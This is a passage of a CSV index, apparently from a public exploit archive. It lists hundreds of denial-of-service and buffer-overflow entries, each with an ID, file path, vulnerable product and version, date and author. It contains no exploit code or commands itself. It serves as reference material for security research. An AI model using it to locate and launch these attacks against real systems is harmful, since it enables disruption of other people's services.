Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos, -29039,exploits/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos, -19409,exploits/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos, -19414,exploits/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos, -19415,exploits/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos, -19416,exploits/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos, -19423,exploits/bsd/dos/19423.c,"BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos, -19436,exploits/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos, -19441,exploits/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",hardware,dos, -19445,exploits/windows/dos/19445.txt,"Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos, -19446,exploits/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service",1999-08-08,rpc,multiple,dos, -19453,exploits/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos, -19456,exploits/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos, -19457,exploits/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",multiple,dos, -19463,exploits/linux/dos/19463.c,"SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos, -19471,exploits/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos, -19477,exploits/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos, -19482,exploits/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos, -19483,exploits/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos, -19488,exploits/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos, -19489,exploits/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos, -19505,exploits/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos, -19507,exploits/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos, -19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos, -19531,exploits/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos, -19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos, -19541,exploits/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos, -19562,exploits/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos, -19563,exploits/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos, -19564,exploits/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos, -19569,exploits/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (PoC)",1999-10-28,"Alberto Soli",windows,dos, -19571,exploits/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - 'RCPT TO' Denial of Service",1999-10-28,"Nobuo Miwa",multiple,dos, -19575,exploits/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of Service",2012-07-04,"Soroush Dalili",windows,dos, -19577,exploits/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (1)",1999-10-31,nas,windows,dos, -19578,exploits/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos, -19675,exploits/linux/dos/19675.c,"Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options",1999-12-08,"Andrea Arcangeli",linux,dos, -19596,exploits/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username Denial of Service",1999-11-03,"Ussr Labs",windows,dos, -19605,exploits/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos, -19615,exploits/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos, -19616,exploits/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow",1999-11-08,Interrupt,windows,dos, -19619,exploits/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server - Denial of Service",1999-11-10,"Ussr Labs",windows,dos, -19624,exploits/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service",1999-11-17,"Ussr Labs",windows,dos, -19635,exploits/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service",1999-11-19,"Elias Levy",solaris,dos, -19636,exploits/windows/dos/19636.txt,"Dick Lin ZetaMail 2.1 - Login Denial of Service",1999-11-18,"Ussr Labs",windows,dos, -19638,exploits/windows/dos/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service",1999-11-19,"Kevork Belian",windows,dos, -19639,exploits/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow Denial of Service",1999-11-24,"Ussr Labs",windows,dos, -19640,exploits/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL Denial of Service",1999-11-26,"Ussr Labs",windows,dos, -19664,exploits/windows/dos/19664.txt,"Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos, -19666,exploits/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - Denial of Service",1999-12-06,"Ussr Labs",windows,dos, -19681,exploits/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service",1999-12-22,"Brock Tellier",solaris,dos, -19687,exploits/freebsd/dos/19687.c,"Real Networks Real Server 5.0 - ramgen Denial of Service",1999-12-23,bow,freebsd,dos, -19695,exploits/windows/dos/19695.txt,"Michael Lamont Savant Web Server 2.0 - NULL Character Denial of Service",1999-12-28,"Ussr Labs",windows,dos, -19701,exploits/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",linux,dos, -19702,exploits/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos, -19703,exploits/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos, -19711,exploits/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor 'status.cgi' Denial of Service",2000-01-05,"Ussr Labs",windows,dos, -19716,exploits/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos, -19720,exploits/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos, -19725,exploits/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos, -19740,exploits/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - 'CWD/MKD' Denial of Service",2000-02-03,crc,windows,dos, -19744,exploits/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos, -19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",novell,dos, -19748,exploits/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR Denial of Service",2000-02-10,"Nobuo Miwa",windows,dos, -19750,exploits/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 - Denial of Service",2000-02-11,eth0,multiple,dos, -19755,exploits/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos, -19759,exploits/windows/dos/19759.c,"Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service",2000-01-18,"Kit Knox",windows,dos, -19760,exploits/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos, -19766,exploits/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos, -19772,exploits/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",windows,dos, -19777,exploits/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",windows,dos, -19780,exploits/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos, -19782,exploits/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos, -19783,exploits/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET",1999-08-25,"ISS X-Force",windows,dos, -19799,exploits/windows/dos/19799.txt,"Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos, -19806,exploits/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos, -19807,exploits/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos, -19810,exploits/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos, -19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos, -19818,exploits/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos, -19820,exploits/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos, -19827,exploits/windows/dos/19827.txt,"Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos, -19963,exploits/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos, -19834,exploits/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos, -19835,exploits/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos, -19843,exploits/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos, -19850,exploits/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow",2000-04-16,"Michal Zalewski",linux,dos, -19853,exploits/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos, -19854,exploits/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos, -19856,exploits/windows/dos/19856.txt,"RealNetworks Real Server 7.0 / GameHouse dldisplay ActiveX control 0 - Denial of Service",2000-04-20,"Ussr Labs",windows,dos,7070 -19960,exploits/windows/dos/19960.txt,"Oracle Outside-In - '.FPX' File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos, -19866,exploits/windows/dos/19866.pl,"DomsHttpd 1.0 - Remote Denial of Service",2012-07-16,"Jean Pascal Pereira",windows,dos, -19869,exploits/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service",2000-04-19,"Alex Mottram",linux,dos, -19870,exploits/linux/dos/19870.pl,"CVS 1.10.7 - Local Denial of Service",2000-04-23,"Michal Szymanski",linux,dos, -19880,exploits/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,windows,dos, -19884,exploits/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos, -19885,exploits/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos, -19896,exploits/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos, -19899,exploits/cgi/dos/19899.txt,"UltraBoard 1.6 - Denial of Service",2000-05-05,"Juan M. Bello Rivas",cgi,dos, -19907,exploits/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 - Malformed File Extension Denial of Service",2000-05-11,"Ussr Labs",windows,dos, -19919,exploits/hardware/dos/19919.c,"Cisco 7xx Series Router - Denial of Service",1999-03-11,Tiz.Telesup,hardware,dos, -19920,exploits/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service",2000-05-16,"HaCk-13 TeaM",multiple,dos, -19923,exploits/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - Denial of Service",2000-05-17,cassius,hardware,dos, -19965,exploits/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing Denial of Service",2000-05-24,"Ussr Labs",multiple,dos, -19938,exploits/beos/dos/19938.txt,"BeOS 5.0 - TCP Fragmentation Remote Denial of Service",2000-05-18,visi0n,beos,dos, -19940,exploits/windows/dos/19940.c,"Axent NetProwler 3.0 - IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",windows,dos, -19941,exploits/windows/dos/19941.casl,"Axent NetProwler 3.0 - IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",windows,dos, -19950,exploits/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos, -19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos, -19962,exploits/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos, -19974,exploits/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",windows,dos, -19977,exploits/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",multiple,dos, -19982,exploits/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0 / NetBSD 1.4.1/1.4.2 / OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos, -19984,exploits/multiple/dos/19984.c,"Eterm 0.8.10 / rxvt 2.6.1 / PuTTY 0.48 / X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos, -19986,exploits/windows/dos/19986.txt,"Oxide WebServer 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos, -19987,exploits/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos, -19988,exploits/windows/dos/19988.pl,"httpdx 1.5.4 - HTTP Server Remote Denial of Service",2012-07-20,st3n,windows,dos, -19994,exploits/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 - Fragmented Packets Denial of Service",2000-05-23,phonix,windows,dos, -19996,exploits/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service",2000-06-07,"Stuart McClure",multiple,dos, -20005,exploits/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos, -20006,exploits/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)",2000-06-08,"Renaud Deraison",windows,dos, -20015,exploits/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - Denial of Service",2000-07-15,"Ussr Labs",windows,dos, -20016,exploits/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service Vulnerabilities",2000-06-16,Prizm,windows,dos, -20017,exploits/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos, -20020,exploits/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL Denial of Service",2000-06-16,Craig,windows,dos, -20023,exploits/linux/dos/20023.c,"Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos, -20025,exploits/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos, -20026,exploits/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos, -20039,exploits/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - Denial of Service",2000-06-25,"MDMA Crew",windows,dos, -20047,exploits/windows/dos/20047.txt,"Microsoft Windows Server 2000 - Telnet Server Denial of Service",2000-06-30,"SecureXpert Labs",windows,dos, -20049,exploits/windows/dos/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 - Resource Exhaustion (Denial of Service)",2000-06-30,"SecureXpert Labs",windows,dos, -20050,exploits/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 - Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos, -20051,exploits/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",windows,dos, -20052,exploits/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos, -20054,exploits/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos, -20069,exploits/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos, -20071,exploits/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service",2000-03-10,"Charles Chear",cgi,dos, -20072,exploits/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 - SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos, -20080,exploits/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos, -20090,exploits/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command Denial of Service",2000-07-19,"Peter Grundl",hardware,dos, -20094,exploits/windows/dos/20094.txt,"NullSoft Winamp 2.64 - '.m3u' Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",windows,dos, -20098,exploits/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",multiple,dos, -20099,exploits/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,windows,dos, -20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",windows,dos, -20101,exploits/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",windows,dos, -20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",windows,dos, -43147,exploits/hardware/dos/43147.sh,"D-Link DIR-605L < 2.08 - Denial of Service",2017-11-14,"Enrique Castillo",hardware,dos, -20167,exploits/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,linux,dos, -20175,exploits/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos, -20178,exploits/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 - Denial of Service",2000-08-19,sinfony,multiple,dos, -20192,exploits/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions Denial of Service",2000-09-06,"Dixie Flatline",unix,dos, -20217,exploits/linux/dos/20217.txt,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service",2000-09-09,"zenith parsec",linux,dos, -20219,exploits/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos, -20221,exploits/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos, -20225,exploits/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos, -20226,exploits/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos, -20228,exploits/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos, -20229,exploits/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos, -20233,exploits/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos, -20239,exploits/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,multiple,dos, -20254,exploits/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",windows,dos, -20255,exploits/windows/dos/20255.txt,"Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos, -20271,exploits/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos, -20272,exploits/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos, -20282,exploits/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos, -20289,exploits/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing Denial of Service",2000-10-13,"Kirk Corey",windows,dos, -20295,exploits/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution",2012-08-06,rgod,windows,dos, -20304,exploits/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos, -20307,exploits/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos, -20310,exploits/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos, -20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos, -20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos, -20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos, -20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos, -20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,hardware,dos, -20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos, -43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",windows,dos, -20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,hp-ux,dos, -20376,exploits/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",unix,dos, -20379,exploits/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 - Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos, -20388,exploits/linux/dos/20388.txt,"ISC BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos, -20400,exploits/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos, -21041,exploits/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",multiple,dos, -20403,exploits/windows/dos/20403.txt,"Small HTTP Server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos, -20432,exploits/windows/dos/20432.txt,"Network Associates Webshield SMTP 4.5 - Invalid Outgoing Recipient Field Denial of Service",2000-11-23,"Jari Helenius",windows,dos, -20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos, -20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos, -20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos, -20440,exploits/windows/dos/20440.txt,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog & lerper",windows,dos, -20464,exploits/windows/dos/20464.py,"Spytech NetVizor 6.1 - 'services.exe' Denial of Service",2012-08-12,loneferret,windows,dos, -20470,exploits/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,windows,dos, -20473,exploits/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos, -20479,exploits/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 